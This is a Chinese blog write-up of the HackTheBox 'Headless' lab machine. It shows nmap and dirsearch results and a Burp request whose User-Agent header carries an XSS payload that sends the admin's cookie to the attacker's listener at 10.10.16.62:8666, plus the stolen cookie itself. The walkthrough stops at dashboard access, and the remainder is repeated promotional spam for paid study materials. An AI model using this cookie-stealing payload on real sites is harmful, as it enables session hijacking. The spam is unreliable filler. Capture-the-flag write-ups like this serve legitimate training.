HTB靶机渗透之headless(linux-easy)_headless htb，架构师花费近一年时间整理出来的网络安全核心知识

|
|

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 581.03 ms 10.10.16.1
2 276.02 ms 10.10.11.8

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 331.02 seconds

结果很长，总结一下：

开放了22和5000端口，22端口自然是openssh，但5000端口这个协议不常见啊，查了一下upnp协议好像是在路由器上运行的服务，不过跑出了http协议，浏览器访问一下

同时dirsearch跑一跑爆出了/dashboard目录

显示是一个正在建设的网站，底下有一个提交问题的按钮，看看内容

底下有一个表单，是提交信息的，可以随便填填看看，另外用紫色小插件获得的信息如下：

网站使用了python中的flask模板，所以现在了一下几个攻击思路：

1.SSTI注入（flask）

2.sql注入（表单）

3.xss（表单+网站场景）

遂一个一个尝试，于是打开burp随便输入了一个SSTI的%a0截断

爆出了一个waf页面，提示这个browser information会被发送给管理员，哦豁，好像xss的可能性增加了（就是xss）

另外dashboard提示如下：

说明我们没有权限，这更加确定了xss的方向

二、获得立足点

所以我们在浏览器的基本信息里插入xss看看会不会成功吧，这里选择user-agent字段

于是有以下数据包：

POST /support HTTP/1.1
Host: 10.10.11.8:5000
Content-Length: 47
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.11.8:5000
Content-Type: application/x-www-form-urlencoded
User-Agent: <img src=15m0 οnerrοr=fetch(“http://10.10.16.62:8666/?cookie=”+document.cookie);>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.11.8:5000/support
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

fname=1&lname=1&email=1@1.com&phone=1&message=1%0a{{1*1}}

这里我们要故意让这个数据包触发违规，这样数据包才能发送到管理员那里。这样我们就构造好了一个恶意xss数据包，但是别着急，我们还要在本地用python开一个服务器以便接收请求

python3 -m http.server 8666

然后我们发送数据包给网站，然后静静等待

果然弹出了cookie

cookie如下：

is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0

接下来我们去拿着这个cookie访问一下dirsearch扫出的dashboard

果然进入了

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新

如果你觉得这些内容对你有帮助，可以添加VX：vip204888 （备注网络安全获取）

学习路线：

这个方向初期比较容易入门一些，掌握一些基本技术，拿起各种现成的工具就可以开黑了。不过，要想从脚本小子变成黑客大神，这个方向越往后，需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容：

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/bdd2c08a12003b634bcf3aaff78d9f11.png#pic_center)

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！
[外链图片转存中…(img-sgQrvciR-1712663177719)]